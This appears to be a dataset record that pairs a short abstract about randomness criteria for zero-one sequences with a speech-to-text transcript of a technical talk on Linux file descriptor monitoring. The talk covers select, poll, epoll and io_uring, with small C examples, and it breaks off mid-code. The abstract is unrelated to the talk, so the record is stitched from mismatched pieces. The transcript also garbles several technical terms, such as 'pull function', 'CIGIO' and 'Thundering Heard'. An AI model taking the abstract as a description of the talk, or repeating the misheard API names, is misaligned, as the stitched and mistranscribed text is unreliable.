I will discuss a criterion for randomness of sequences of zeros and ones which is strictly stronger than normality, but holds for almost every sequence generated by i.i.d. random variables with distribution {1/2, 1/2}. Briefly put, the idea is to count the number of times blocks of length n appear in the initial block of length 2^n. I will also discuss an extension of this idea to toral automorphisms.
|
10.5446/13946 (DOI)
|
Hi, my name is Stefan Heinetzi and today we're going to talk about the evolution of file descriptor monitoring in Linux. So what is file descriptor monitoring? File descriptor monitoring APIs allow applications to find out which file descriptors are ready to perform I.O. So that could be something like a server that is handling a bunch of different connections and also has a listen socket. Well, it might want to know when a new client connects to its listen socket. It might also need to know when new data arrives on one of the existing established connections. In other cases, you might have, for example, a pipe which has a finite sized write buffer. And if the application fills up that write buffer, it can't write any more data to it until the other side of the pipe, the reader, has read some of that data. And so file descriptor monitoring can let the application know when there's more write buffer space available. In Linux, there are a number of APIs for file descriptor monitoring. These system calls have been added over the years and they have different characteristics. They have different API designs and they have different performance and scalability. So today, what we're going to do is we're going to have a look at these APIs in turn and then we're going to compare them. So applications still use all of these APIs and this is not some functionality that has been obsolete completely in the kernel. So it's still normal to see different applications using different APIs, but that makes it especially interesting to go and look at them and understand their differences so that we can choose which ones to use ourselves. Before we start looking at the actual system call API design and the performance, let's have a look at how file descriptor monitoring works inside the kernel. Inside the kernel, various file descriptor types are implemented. For example, device drivers might have some file types that they have. Of course, file systems also implement file types. And these file types have a pull function. This pull function returns the set of events that are currently available on that file descriptor. So it could be, for example, that the file descriptor is ready for reading. But this pull function also allows the caller to register themselves and receive a wake up when that file finally becomes ready for the events that it is looking for. The exception to this single API that exists inside the kernel is CIGIO. It has its own API. But for the most part, these very different system calls are actually implemented using this one API in the kernel. Now what are the set of events that the kernel knows about and the set of events that it will raise? Here is the table with the most important ones. The read and the write are the very commonly used ones that are used for finding out when a socket has more data to read or, for example, when a pipe can be written to. There are also events for closing file descriptors, in particular for finding out when the other side of a socket or a pipe has been closed. So there is a hang up, an E-PollHOP event, which notifies the application that the socket has been closed. That doesn't mean that the file descriptor is completely finished and no longer useful because there might still be data in the receive buffers that user space can still read before it itself decides to let go of that socket. There are also some file specific events. So this depends on the specific file type. 
And a driver, for example, might raise this event when something relevant to its file type happens. That's the E-PollPri flag. It's not used very often. There's also an error flag, of course, in case something goes wrong and the application needs to respond in order to handle this file descriptor that's no longer usable. There's some out of band events, which I haven't even shown here because they're quite rare. They're used for TCP connections, which have the concept of sending data outside of the normal stream. And another thing that's interesting to note is that when these file descriptor events occur, they occur at a point in time. By the time that user space gets around to actually, for example, reading from that file descriptor that had something available, it could be that the file descriptor no longer has data available, either because another thread or another process read from it, or maybe something else happened. So it's important for applications to be aware that in some cases maybe they'll receive an event, and when they actually try to respond to that event, things have already changed and moved on. The kernel has the O non-block open flag for files, and it's important to set this this way. If the application finds out the file is ready for reading, and it does the read, but there's actually no data there, then the kernel will return with E again and let the application know there was nothing. By default, file descriptors are not in non-blocking mode, instead the process would actually be put to sleep, so this would hang the application. So it's worth knowing this. Now before we look at the various APIs in detail, I want to still take a step back, and let's remind ourselves why is file descriptor monitoring used at all? Why do applications do this? Let's take an example, say we're implementing a text-based matrix chat client. We have two sources of activity here. The human who is interacting and entering chat messages that they want to send to the chat room on the keyboard, and the second source of activity is the matrix server, which is sending us the messages that remote users have posted to the chat room, and we need to display them. So we have two different things we need to do at the same time, two different IO activities, and one way of implementing this would be to spawn one thread for the terminal, for the TTY, and one thread for the matrix server socket, and those threads could then process any data that becomes available on those file descriptors. The thing with threads though is that you need some coordination for the life cycle of the thread to safely start it and stop it at the appropriate time, and in addition to that, if there are any shared resources in use, for example, the user interface, which has both updates from the keyboard when the user enters a message and updates from the server when new messages appear, we will need to protect that and implement some synchronization or something to make sure that the terminal, the TTY thread, and the matrix server socket thread don't interfere with each other. So this adds complexity. It would be nice if there was a way to avoid having to have this complexity that that multi-threading brings. The final thing to keep in mind with threads is that they're not free. They are resources and they have some amount of overhead. They have a cost associated with them. 
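As a brief aside on the O_NONBLOCK point made a little earlier, the usual way to switch an already-open descriptor into non-blocking mode is with fcntl(). This is a minimal sketch, not code from the talk; the helper name is only for illustration.

```c
#include <fcntl.h>

/* Put an already-open file descriptor into non-blocking mode, so that
 * read()/write() return -1 with errno set to EAGAIN instead of putting
 * the process to sleep when no data (or no buffer space) is available. */
static int set_nonblocking(int fd)
{
    int flags = fcntl(fd, F_GETFL, 0);              /* current file status flags */
    if (flags == -1)
        return -1;
    return fcntl(fd, F_SETFL, flags | O_NONBLOCK);  /* add the non-blocking bit  */
}
```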
And this is particularly apparent when you have a server that has many, many thousands or tens of thousands of file descriptors, because each of those threads is going to have a call stack and it's also going to have some kernel resources associated with it. So is there another way, a more lightweight way, a way that doesn't require complex coordination? Yes, there is. One approach is using an event loop. So this is called an event-driven architecture. Instead of making every IOTask a separate thread, we can instead have an event loop and each activity, so for example the terminal, the TTY file descriptor, whenever it becomes ready, that's an event. We wait for the next event, we handle the current event, and then we go back into the loop and we just repeat doing this until the application stops. And in this event loop approach, file descriptor monitoring is what powers this next event function or this next event primitive. We need to have the ability to monitor a set of file descriptors and see which one of them is ready and then we'll let our application handle it. To become a bit more concrete as well, where is this used in the real world? Which applications use file descriptor monitoring? Well, pretty much all GUI applications, all graphical applications tend to do this because GTK, QT, and also other user interface frameworks, even on other platforms, tend to be based on event loops and they tend to monitor file descriptors. That tends to be what powers the core of user interfaces. But it's not just graphical applications. Servers like NGINX, the web server, is a well-known example for an application that uses an event-driven architecture and event loops. You might also hear about thread per core architectures, which are becoming popular for storage and network processing. And the idea there is that you start a thread for each CPU, but then on that CPU, you run an event loop in order to process work. And finally, you might also come across file descriptor monitoring when it's simply used in order to get around limitations of blocking APIs. And what I mean by that is that sometimes you want to read from a file or write from a file or perform some other blocking operation, an operation that can take a long time. And if those system calls do not have timeouts or cancellations, sometimes an approach that people take is they use a file descriptor monitoring API in order to get that functionality so that they can cancel our timeout. Okay. So we've covered the background for what is file descriptor monitoring, why do applications use it, and what are some of the real world examples. Now let's take a look at the select system call. The select system call is the first of the ones we're going to look at because it is the earliest one that's still widely used. It was introduced in 4.2 BSD, so before Linux. And the variant that I'm showing here on this slide is Pselect. This is a newer version of it. It's a POSIX system call, so it's available not just on Linux. And what this system call added on top of the original select is it has a nanosecond timeout and it also has a signal mask. The reason I'm mentioning these things is I'm always going to show you the most powerful and most recent variant of these system call families because they're useful, for example, if you need high resolution timers, you want to make sure to use something that has, say, more than just millisecond or even microsecond resolution. 
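Stepping back for a moment to the event-loop pattern described above, a schematic skeleton might look like the following. The functions next_event() and handle_event() are hypothetical application hooks, not real library calls; any of the APIs discussed here could sit behind next_event().

```c
/* Schematic event-loop skeleton of the kind described above.
 * next_event() and handle_event() are hypothetical application hooks. */
struct event;                          /* opaque application event type        */
struct event *next_event(void);        /* block until some fd is ready         */
void handle_event(struct event *ev);   /* dispatch to the object it belongs to */

void run_event_loop(void)
{
    for (;;) {
        struct event *ev = next_event();   /* wait for the next event  */
        if (ev == NULL)
            break;                         /* e.g. shutdown requested  */
        handle_event(ev);                  /* handle the current event */
    }
}
```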
Or if you're using POSIX signals in your application, then being able to control the signal mask while you're in a blocking system call is important because you need to decide when to block and unblock certain signals. Okay, but let's get to the file descriptor monitoring part. So how does select work? The select system call takes up to three bitmaps, these FD sets. And user space will set a bit to one if it wants to monitor that file descriptor number. So for example, say we want to monitor file descriptor number four, then we would have to set the fifth bit in the bitmap to one to tell the kernel we want to monitor file descriptor number four because the bits, right, they're numbered zero, one, two, three, four, and then that's the one that we want to set to one. If we set it to zero, the kernel will not monitor it. And that's how you build these FD set bitmaps. When you call the system call, the kernel will then look at that bitmap, will monitor the file descriptor numbers that you requested. And when a file descriptor becomes ready or when there's a timeout, it will write out a new bitmap. It will overwrite your bitmap. And instead, you'll have a one if the file descriptor was actually ready, or you'll have a zero if the file descriptor is not ready. And the return value to the system call is just the total number of bits set. And so this is how we can monitor multiple file descriptors with one system call. That's the select system call. Now select has some well-known design quirks, some limitations that make programming with it a little limited in some cases. First of all, this bitmap representation of the file descriptor number space is not very efficient because if we have a single file descriptor we want to monitor, but it happens to have a high number, then we need to provide a long bitmap with zeros all the way up to the file descriptor that we want to monitor. And then when the kernel processes the system call, it's going to have to scan that bitmap to find R1. It's going to have to start from the beginning of the bitmap. And so this is just going to waste CPU. It's maybe not a very good representation to use when you have just a few file descriptors, especially if the numbers are high. Another quirk is that POSIX select has a constant called fdsetsize. And that is the maximum file descriptor count that you can have in the bitmap. So what this means is that on Linux with Glib C, 1,024 is the limit for select. If your application has a file descriptor number that's higher than that, for example, you opened the file and you got file descriptor number 2,000, you would just simply not be able to use the Glib C select function in order to monitor that because it won't fit in the bitmap. So that's a pretty severe limitation if you want to be able to process many file descriptors. So for something that needs to scale and have a lot of file descriptors, select is basically out of the question. Okay, another API design aspect that we're going to be looking at as we go through these different system call APIs is how does the application associate an object with that file descriptor? A file descriptor number by itself is not necessarily useful to a program. If your program is doing many things at the same time and then you find out, okay, file descriptor 13 is now ready for reading, you might not know what that means. Which object is associated with that file descriptor? Was it an HTTPS session that we had going? Was it a pipe we were using to communicate with another process? 
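To pin down the bitmap mechanics described a little earlier, a minimal pselect() sketch monitoring a single descriptor for reading might look like this. The helper is illustrative and error handling is reduced to the essentials.

```c
#include <sys/select.h>
#include <time.h>
#include <stddef.h>

/* Wait until `fd` is readable or the timeout expires.
 * Returns 1 if readable, 0 on timeout, -1 on error.
 * Note: with glibc this only works for fd < FD_SETSIZE (1024). */
static int wait_readable(int fd, const struct timespec *timeout)
{
    fd_set rfds;

    FD_ZERO(&rfds);            /* clear the whole bitmap               */
    FD_SET(fd, &rfds);         /* set the bit for the fd we care about */

    int n = pselect(fd + 1, &rfds, NULL, NULL, timeout, NULL);
    if (n <= 0)
        return n;              /* 0 means timeout, -1 means error      */

    return FD_ISSET(fd, &rfds) ? 1 : 0;   /* kernel rewrote the bitmap */
}
```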
We need some way of being able to connect the file descriptor with an application object so we can then easily handle the event for that object. Select tends to not do so well here. Usually select is used in a hard coded way where you see actual code that literally says if a particular file descriptor, for example, in our matrix client, if the TTY file descriptor is set, then go and process the TTY. And that is fine when you have a fixed number of file descriptors that you know at compile time. It doesn't work so well if you have, say, a server that's going to have many sessions and the number of file descriptors is dynamic. Now we need to figure out some way. So an obvious way is to just create a hash table but that is going to be a little bit inconvenient. We'll have to set up an extra data structure and it's going to be a hash table to go from a file descriptor number to our application object. So it doesn't have a built in way of doing this. We're going to see later on how other APIs make this easier. Okay, so let's move on from select. Poll is a POSIX API so it's widely available and it makes some of these shortcomings of select go away because it chooses a different representation for the file descriptors. Instead of using this bitmap that we had with select, it uses an array of struct poll FDs and so now we're no longer having to use a bit for every possible file descriptor number. Instead we just use a poll FD for each file descriptor that we actually want to monitor. We don't have zeros anymore. We just have the poll FDs that we are interested in. So that's an interesting approach. It has an input event mask. That's the poll FD events field where the application sets the events it cares about. For example, poll in or poll hop and then it has an R events field where the kernel writes the actual result event mask, the actual events that are ready. So that could be zero if there's no activity on this file descriptor or it could be a non-zero value if one of the bits that we were looking for is ready. It returns the event count, the total number of file descriptors that are actually available. So this is the poll API. Let's look at how it compares to select. So first of all, we're no longer limited to 1024 file descriptors which is a very important property if we want to be able to handle many, many connections at the same time. And the reason for not having this limitation is we're no longer using this bitmap and we no longer have that fixed FD set size. Okay. And in addition to that, we're now using a dense file descriptor list. We don't have all those zeros. So that's another improvement. Why is an improvement? It's an improvement because it means that the kernel, when processing the system call, no longer needs to scan all those zeros and skip through all of them. Instead, it just gets a useful list of the actual FDs that we want to monitor. Okay. So some CPU cycles are saved. Another interesting design decision is that there's that R events field. The kernel does not update our input event mask when we make the system call. Why does that matter? Why is that important? Well, it means you can set up the poll FD array once and then your application can loop and just keep calling poll as long as your set of file descriptors doesn't change. It can just keep calling poll and doesn't need to rebuild that poll FDs array every time it calls poll, which is a nice property. In select, we didn't have that because the kernel overwrote the FD sets that we passed in those bitmaps. 
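As a concrete sketch of the struct pollfd pattern just described (illustrative, not code from the talk):

```c
#include <poll.h>

/* Monitor a set of descriptors for readability with poll().  The pollfd
 * array can be built once and reused across calls, because the kernel
 * only writes to .revents.  Returns the number of ready descriptors. */
static int wait_any_readable(struct pollfd *fds, nfds_t nfds, int timeout_ms)
{
    int n = poll(fds, nfds, timeout_ms);
    if (n <= 0)
        return n;                    /* 0 means timeout, -1 means error */

    int remaining = n;
    for (nfds_t i = 0; i < nfds && remaining > 0; i++) {
        if (fds[i].revents != 0) {
            /* fds[i].fd is ready; the application dispatches here, e.g.
             * via a parallel array of object pointers indexed by i.    */
            remaining--;             /* stop early once every ready fd
                                        reported by poll() was seen     */
        }
    }
    return n;
}

/* Caller sets up something like:
 *   struct pollfd fds[2] = {
 *       { .fd = tty_fd,    .events = POLLIN },
 *       { .fd = socket_fd, .events = POLLIN },
 *   };
 */
```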
We have to recreate the bitmaps every time from scratch. So this is an improvement that poll makes. That's nice. It saves CPU cycles. Finally, application object lookup is now simpler. We can just have a parallel array next to the poll FDs. We just have another array and each entry corresponds to the same index in the FDs array and we just store the object, the pointer to the object. And that way we can efficiently and easily look up the application object associated with this FD. So that's an improvement. The final thing I wanted to show in this slide is a common optimization that programs make. Since the system call told us how many FDs were ready, we can short circuit this for loop. We don't have to scan every poll FDs struct. Then we were monitoring a thousand poll FDs and only one of them was ready. As soon as we find that one, we will leave this for loop and we'll stop scanning. So that's a nice quality to have. We can save some CPU cycles by doing that. Great. So we've looked at select and we've looked at poll. Those are the most portable, they're POSIX, they're widely used, but they're relatively old and they do have some known scalability issues. So now let's move into the 21st century. So E-Poll was added to Linux in the 2000s and it changed the API. It made quite a big, it was quite a big departure from poll and select, which we're about to see. So E-Poll has an E-Poll control system call that we can invoke every time we want to add another or remove a file descriptor from the set of file descriptors that we're monitoring. And in fact, E-Poll itself is represented as a file. So you have an E-Poll file descriptor that you create with the E-Poll create one system call. And this allows you to actually have multiple sets of E-Poll in your application at the same time. If maybe you want to either have nested event loops or you just have different event loops and you want to keep them separate, you can do that. It's not global, it's not per process. Instead it's actually, you can have many instances and each one of them is one E-Poll file descriptor, which is an interesting aspect and we'll see more of that later. So how does it work? Well, we tell E-Poll control which file descriptor we want to monitor and we pass it an event mask similar to how we did it with the poll system call. We also have a data field where we can store an application specific value. We're going to get that value back when this file descriptor becomes ready. And so you can already imagine what that's going to do. It's going to make the application object look up even easier because the kernel will tell us which application object we wanted if we decide to store, for example, the pointer to the object in this data field. So that's something that's coming. All right, so we have been able to add file descriptors for monitoring, but how do we actually get events back? There is a system call called E-Poll P-weight. Here I've shown you the new Linux 5.11 version of the system call. This variant is called E-Poll P-weight 2 and the reason I wanted to show it to you is because it now finally has nanosecond timer resolution, which is excellent for applications that need high resolution timers. That was one of the few big limitations of E-Poll for a long time and now it's been solved. So that's awesome in the next 5.11. 
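A minimal sketch of the epoll flow just described: create an instance, register a descriptor together with an application pointer via epoll_ctl(), then harvest events. The talk shows epoll_pwait2(); the sketch below uses the older epoll_wait() for brevity, which differs only in timeout resolution and signal-mask handling.

```c
#include <sys/epoll.h>

/* Register an application object for read monitoring.  The kernel hands
 * `obj` back in event.data.ptr when the descriptor becomes ready, which
 * is what makes object lookup trivial compared to select()/poll(). */
static int watch_fd(int epfd, int fd, void *obj)
{
    struct epoll_event ev = { .events = EPOLLIN, .data.ptr = obj };
    return epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &ev);
}

/* Harvest up to 10 ready events even if thousands of fds are monitored. */
static int harvest(int epfd)
{
    struct epoll_event events[10];
    int n = epoll_wait(epfd, events, 10, -1 /* block until ready */);

    for (int i = 0; i < n; i++) {
        void *obj = events[i].data.ptr;   /* the object registered above    */
        (void)obj;                        /* application dispatch goes here */
    }
    return n;
}

/* Setup:  int epfd = epoll_create1(0);  then watch_fd(epfd, fd, obj);  */
```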
Okay, so when we call the system call, we give it an array of E-Poll events and we tell it how many events there are and the kernel will then go and collect the readiness information from the file descriptors and write them into this array and return the number of ready FDs, the number of events that it filled out. What's interesting here and what's different from poll is that we could be monitoring a thousand file descriptors and yet we can call this system call with just say 10 event array elements that the kernel will fill in. And the kernel is prepared to handle that. That's perfectly fine. And it makes a lot of sense because a lot of time your application will only ever have one or two or a few files that are ready at a given time in the event loop. And so it would have been wasteful to have to allocate, if we're monitoring a thousand file descriptors, it would be wasteful to allocate a thousand E-Poll events just in case all of them happen to be ready at the same time. So this is a bit of a gives you some flexibility, allows you to minimize resources if you want. And the kernel also has a built-in algorithm to make sure that if you do have a thousand file descriptors and you only read out the first 10 events, when you call it again, it remembers which ones you've already processed. And even if those files do become ready again, say even more data has arrived with the socket, it won't return them yet. It will make sure that you receive all the other pending events first. So this prevents starvation because imagine you had a loop and there was a lot of activity on the file descriptors and you were only ever harvesting a subset of them, then some of the high numbered file descriptors at the end of the array would just never be processed. So this is a useful feature to have. But that's not all. E-Poll has quite a few interesting things. So E-Poll has an edge triggered mode. If your application decides not to actually do something that will change that readiness state, so if your socket was readable, but then you decide you don't actually want to read it yet and you still want to call it E-Poll wait again, then you have a problem because that file is still readable. So you'll get an event back again saying, hey, the file is readable and you may want to defer that. So one efficient way of doing that is to use the edge triggered mode. What this does is it means that E-Poll will return events when they transition state, so going from not ready to ready instead of returning the level of the event, whether it's ready or not. That way you won't be bothered with lots of returns repeatedly for events that you haven't handled yet. There's also a one shot mode that you can enable. What this does is say you want to respond to an event on a file descriptor, but then you're going to wait for a while after you've handled that before you start monitoring again. With E-Poll system call design, you would actually have to use E-Poll control one more time in order to disable that file descriptor temporarily. Now with the one shot mode, you can get that for free because you're telling the kernel, hey, when this fires, when it triggers, please just disable it. And I'll bring it back later on when I'm ready. So it saves some of the system calls. It's a bit more efficient. The final mode that I really wanted to talk to you about is the E-Poll exclusive mode, which optimizes the way that multiple waiters who are all waiting for a file descriptor to become ready are handled. Let's look at that in detail. 
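Before that, here is how the edge-triggered and one-shot modes just described are selected; they are just extra flags on the same epoll_ctl() registration (a sketch, helper names illustrative).

```c
#include <sys/epoll.h>

/* Edge-triggered: only not-ready to ready transitions are reported, so
 * the application is expected to drain the fd until it sees EAGAIN. */
static int watch_edge_triggered(int epfd, int fd, void *obj)
{
    struct epoll_event ev = { .events = EPOLLIN | EPOLLET, .data.ptr = obj };
    return epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &ev);
}

/* One-shot: the fd is disarmed after it fires once; re-arm it later with
 * EPOLL_CTL_MOD when the application is ready for the next event. */
static int watch_one_shot(int epfd, int fd, void *obj)
{
    struct epoll_event ev = { .events = EPOLLIN | EPOLLONESHOT, .data.ptr = obj };
    return epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &ev);
}

static int rearm_one_shot(int epfd, int fd, void *obj)
{
    struct epoll_event ev = { .events = EPOLLIN | EPOLLONESHOT, .data.ptr = obj };
    return epoll_ctl(epfd, EPOLL_CTL_MOD, fd, &ev);
}
```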
This is called the Thundering Heard problem. It's a well-known problem in computer science and in operating systems. The problem is if you have multiple processes or threads that are all waiting for work and the work becomes available, what do you do? If you wake all of them up and say, hey, there's work available, please go and grab it, then what will happen is that only one of them will be able to get the new work and the other ones, when they try to grab it, will find that there's no work available because there was only one item. And so that's very inefficient. On the other hand, you need to do this approach for load balancing because otherwise, if you decide who to give it to, if that worker is busy and isn't ready yet for the next piece of work, then your system will slow down and you'll have to wait for it. So this is called the Thundering Heard problem. Whenever we wake up, all of the workers wake up. They try to grab work. Only one of them makes it. Everyone else is just wasting CPU trying to grab work. So what the exclusive flag does is it tells the kernel that it's okay to wake up just a single worker. And that way, you avoid all that extra overhead. Let's look at that. So I ran a benchmark with E-Poll, exclusive on and off. And what we're seeing here is we're seeing the number of messages that were received and sent. And this is divided by the amount of CPU time that was spent. And so we really see the CPU efficiency here. We see how many messages were we able to process per unit of CPU time. As the number of threads goes up on the x-axis, you can see that without the E-Poll exclusive flag, the scalability is poor, the performance drops as we add more threads because they're all going to wake up, try to fetch some work, and it turns out there's nothing to do. And they go back to sleep again and we've wasted CPU. That's why the efficiency is so poor. And we can see how well the E-Poll exclusive flag works when we have a lot of threads. Great. So that was the Thundering Heard. Another big change, a big departure that E-Poll made in its API design is it is a stateful API. It is not a stateless API. Select and pull are stateless. Each time we call them, the kernel starts from scratch. It doesn't know anything about the file descriptors that we're going to be monitoring. And when we're done, it doesn't care anymore. It forgets about it. And we start from scratch every time. So each time the kernel is going to have to set up the monitoring on the whole set of file descriptors only to collect an event for maybe one or two that are actually ready now and return that back. So that's wasteful. And what E-Poll does is because we've created this E-Poll file descriptor using E-Poll create1, it can actually store which file descriptors are being monitored. And when you make the E-Poll P-weight call, what it's doing is it's not setting up the monitoring. That's already been set up. At that point, it's just collecting the events that have occurred. So that's much, much more efficient. So now the kernel doesn't need to loop over all your FDs, set up the monitoring, and so on. Now it just needs to look at which events have already occurred. So this is an improvement that E-Poll makes just in terms of the fundamental design. And the trick here is that it's a stateful API. Now taking this a bit further, how does the efficiency of this look? This big O notation here I'm using is just to show you, does user space or does the kernel have to loop over the data that we're processing many times? 
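Before the complexity comparison that follows, here is roughly how the exclusive flag discussed above is used in a multi-worker setup (a sketch; EPOLLEXCLUSIVE needs Linux 4.5 or newer and is only valid when adding a descriptor).

```c
#include <sys/epoll.h>

/* Each worker thread creates its own epoll instance and registers the
 * shared listen socket with EPOLLEXCLUSIVE, so the kernel wakes up only
 * one waiter per incoming connection instead of the whole herd. */
static int worker_setup(int shared_listen_fd)
{
    int epfd = epoll_create1(0);
    if (epfd == -1)
        return -1;

    struct epoll_event ev = {
        .events  = EPOLLIN | EPOLLEXCLUSIVE,
        .data.fd = shared_listen_fd,
    };
    if (epoll_ctl(epfd, EPOLL_CTL_ADD, shared_listen_fd, &ev) == -1)
        return -1;

    return epfd;   /* the worker then loops on epoll_wait(epfd, ...) */
}
```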
And in the case of select, the kernel actually has to loop over those bitmaps all the way up to the maximum file descriptor number. So that's very inefficient. The pathological case there is say we have file descriptor 1000 and it's the only FD we're monitoring. We still need to create a big bitmap with lots and lots of zeros all the way up to the thousands one. And so that way CPU cycles. Now poll does better. The poll system call does better. It only loops over the actual total number of FDs that we're monitoring. So it doesn't care if the file descriptor number is 1000 or if it's one, the efficiency just hasn't changed there, but it still needs to loop over all of them. So if we want to monitor 1000 FDs, then each poll call is going to have to process all of them. Finally, let's get back to E-Poll. E-Poll is an improvement here. E-Poll only needs to process those that are actually ready. And so you can see that this is a fundamental improvement in terms of efficiency. We only need to see the FDs that are ready. And in user space, the E-Poll events that are returned from poll weight are really just the FDs that we're about to process. So this is great. But that was the 2000s. That was E-Poll. Things have moved on since then. So in the past few years, Linux has gotten the IOU ring system calls and a lot of system calls have now been added to IOU ring so that it can do a lot of functionality asynchronously, which means that there is a submission queue where user space can add requests. And there is a completion queue where user space gets the finished request that the kernel has finished processing. And it allows user space to queue up one or more requests to the kernel. The kernel will then handle them, and the results will be written back to the completion queue when they're done. The system call here is IOU ring enter. And we basically just tell the kernel how many new requests are in the submission queue that we want to process. And we tell it how many requests we want to wait for. Do we want to wait for one request? That could be the next request, whatever that is. Or do you want to wait for 10 requests? Or maybe for no request if we don't actually want to wait at all. So that's how the system call works. There's no timeout here, which you might have noticed compared to all of our other system calls, but we're going to see how that works in a second. OK, so now I mentioned that the submission queue takes these requests. Well, there's lots of request types. Here are the operations that are relevant to file descriptor monitoring. And there are many more that you can find in the documentation that aren't going to be relevant for file descriptor monitoring. Poll add allows us to do a one-shot file descriptor monitoring operation. We can add an FD. We can tell it which events we care about. And this request will complete when the file descriptor has some activity. If we change our mind, if we decide, OK, we don't want to monitor that file descriptor anymore, then we can use the poll remove request type to cancel it. An interesting one, an interesting request type, is the ePollControlRequestType. What this allows us to do is it allows us to invoke the ePollControlSystemCall functionality using IOU ring. So why would we want to do that? We can do it in a way that avoids system calls. So the bottleneck with the ePollControlDesign is that that system call only operates on a single file descriptor. It adds a single file descriptor. It removes a file descriptor or it modifies an existing one. 
But you can't use it to, say, monitor 1,000 file descriptors in a single system call. And if you have a lot of file descriptors that you're changing frequently, then, of course, that system call overhead is going to be relevant. When using IOU ring, you can actually queue up all of these requests and then do a single IOU ring enter system call to process them. See the trick with IOU ring is that the submission queue and the completion queue are M mapped into user space memory. So the user space processes memory space has the submission completion queues. And that's why we can access them and add things and process completions without doing system calls. So that's an interesting use here. And if you remember back when I said ePoll can nest because that file descriptor itself supports polling, we could use that ePoll file descriptor within IOU ring. For example, we could use poll add on the ePoll file descriptor. The final thing I wanted to mention is timeouts since the IOU ring enter system call doesn't have a timeout argument, the way to do it is to add a timeout request to the submission queue. And that way, we'll be able to stop waiting if there is no activity when our timeout expires. OK, so that was a lot. It's a very different model. And here is an example using the libUring user space library. What's happening here is that we are preparing one file descriptor for read monitoring. We're using poll in flag. So we use IOU ring getSQE to get the next available submission queue entry. We then set the file descriptor number on it and the poll in flag. And then we do the IOU ring SQE set data call. And what that does is it associates, it stores our object pointer, our application object, or any 64-bit value that we want. It stores that with the SQE so that when this completes, we'll get that value back and we can look up our application object. OK, great. So we've added the request, but now we're going to tell the kernel about it and we're going to wait for the completion. And we can do that using the single IOU ring submit and wait library call. And when it returns, we know something has happened. And then we can just loop over the completion queue with the IOU ring for each CQE loop. And then our application can handle the completion result. And that user data field that you see there is going to be that object value that we stashed in the submission queue. And then finally, we need to call IOU ring CQE advanced just to tell the kernel that we have now processed those completion queue entries and they can be reused. So that's programming with IOU ring. What are the characteristics of IOU ring compared to EpoL? So first of all, we talked about how EpoL control only handles one FD at a time. Whereas with IOU ring, we can handle many FDs at a time. We can add many FDs, we can remove many FDs in a single system call. So that's an advantage right there. The system call also combines both submission and completion into a single system call. So it further minimizes it. Whereas with EpoL, we had to do EpoL control and EpoL wait. With IOU ring, we only need to do IOU ring enter. That's the only system call. So again, this is a little performance boost if this is in the inner loop of your application or trying to minimize CPU cycles and minimize latency. Another thing that's interesting about IOU ring is that it supports busy waiting, both in the kernel and in user space. 
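Returning for a moment to the liburing sequence walked through above, as code it might look roughly like this; it is a sketch based on the spoken description, with error handling trimmed.

```c
#include <liburing.h>
#include <poll.h>

/* One-shot readiness monitoring of `fd`, roughly following the sequence
 * described above.  `obj` is the application object we want handed back
 * when the request completes. */
static int wait_readable_uring(struct io_uring *ring, int fd, void *obj)
{
    struct io_uring_sqe *sqe = io_uring_get_sqe(ring);   /* next free SQE */
    if (sqe == NULL)
        return -1;

    io_uring_prep_poll_add(sqe, fd, POLLIN);   /* like poll()'s POLLIN         */
    io_uring_sqe_set_data(sqe, obj);           /* stash our pointer            */

    io_uring_submit_and_wait(ring, 1);         /* submit and wait, one syscall */

    struct io_uring_cqe *cqe;
    unsigned head, seen = 0;
    io_uring_for_each_cqe(ring, head, cqe) {
        void *ready_obj = io_uring_cqe_get_data(cqe);   /* our object back     */
        int   revents   = cqe->res;                     /* readiness mask or
                                                           negative errno      */
        (void)ready_obj; (void)revents;                 /* dispatch goes here  */
        seen++;
    }
    io_uring_cq_advance(ring, seen);           /* mark the CQEs as consumed    */
    return 0;
}

/* Setup once:  struct io_uring ring;  io_uring_queue_init(256, &ring, 0); */
```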
Another thing that's interesting about io_uring is that it supports busy waiting, both in the kernel and in user space. What that means is that since the completion queue is mmapped into user space, our user space process can just peek at the completion queue memory and see when requests become ready; it doesn't need to make a system call in order to ask the kernel whether requests have completed. If your application is either CPU intensive or already has a busy-wait loop, you can integrate into that, and you can easily and cheaply check for any io_uring events — which means you can do file descriptor monitoring from within a busy-wait loop in your application. On the kernel side, it's also possible to do busy waiting, because io_uring supports kernel polling threads, but we're not going to get too deep into that. There are also other features that io_uring has — I think we've only really scratched the surface here; it's very powerful. It has a concept of linked requests, it has optimizations for pre-registering file descriptors and buffers so that the kernel doesn't need to keep looking them up, which saves some CPU cycles, and there's a lot more. So it's a really interesting API. Now, I just mentioned busy waiting, so I want to go back and mention that select, poll and epoll also have some busy waiting support. It's limited, but on Linux you can use the net.core.busy_poll sysctl to set the number of microseconds that these system calls should busy wait instead of idling the CPU. This is used in applications where you have dedicated CPU resources and you want to minimize latency: idling the CPU, putting it into a low power state, and then, when a packet comes in, having to wake it up again, reschedule, and get back to what we were doing adds latency. So some applications can use this with select, poll and epoll — I just wanted to mention that since we were talking about busy waiting for io_uring. By the way, this is only available for network sockets on Linux; it's a network subsystem thing, and if you're using other types of file descriptors, it won't work with them. Okay, so we've looked at the APIs, but we're not really done yet, because we talked about threads and some of the pros and cons of threads, and then we looked at file descriptor monitoring — and there's actually another approach we can take aside from threads or file descriptor monitoring. With io_uring, we could just do the I/O operations themselves asynchronously. We could simply tell the kernel, using io_uring, to do a read, and it would complete the request when that read is finished. If the socket or the pipe is not ready, then that request just sits there waiting, but in the meantime our user space thread can make progress. So we can solve the same problem that we had with our Matrix chat client — monitoring and doing I/O on multiple FDs — using asynchronous I/O instead. Why might that be an interesting idea? Because this way we don't need to attempt to read, find out the socket has no data available, add it to the set of FDs to monitor, go into the kernel, wait to be woken up when something happens, and then try reading again. We can eliminate all of that housekeeping work, all of that back and forth, and just do a single asynchronous read. So it's a potentially interesting approach (a rough sketch of what it looks like follows below). One of the issues with it, though, is that it's something more for new applications.
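As a rough illustration of that asynchronous approach — again a sketch under assumptions, not the benchmark code from the talk; stdin stands in for a socket and error handling is omitted:

```c
#include <liburing.h>
#include <stdio.h>

int main(void)
{
    struct io_uring ring;
    char buf[4096];

    io_uring_queue_init(8, &ring, 0);

    /* Instead of "poll for readable, then read", ask the kernel to do the read
       itself; the completion only arrives once data has actually been read.
       Offset 0 is used here since the fd is non-seekable. */
    struct io_uring_sqe *sqe = io_uring_get_sqe(&ring);
    io_uring_prep_read(sqe, 0 /* fd, e.g. a socket */, buf, sizeof(buf), 0);
    io_uring_sqe_set_data(sqe, buf);

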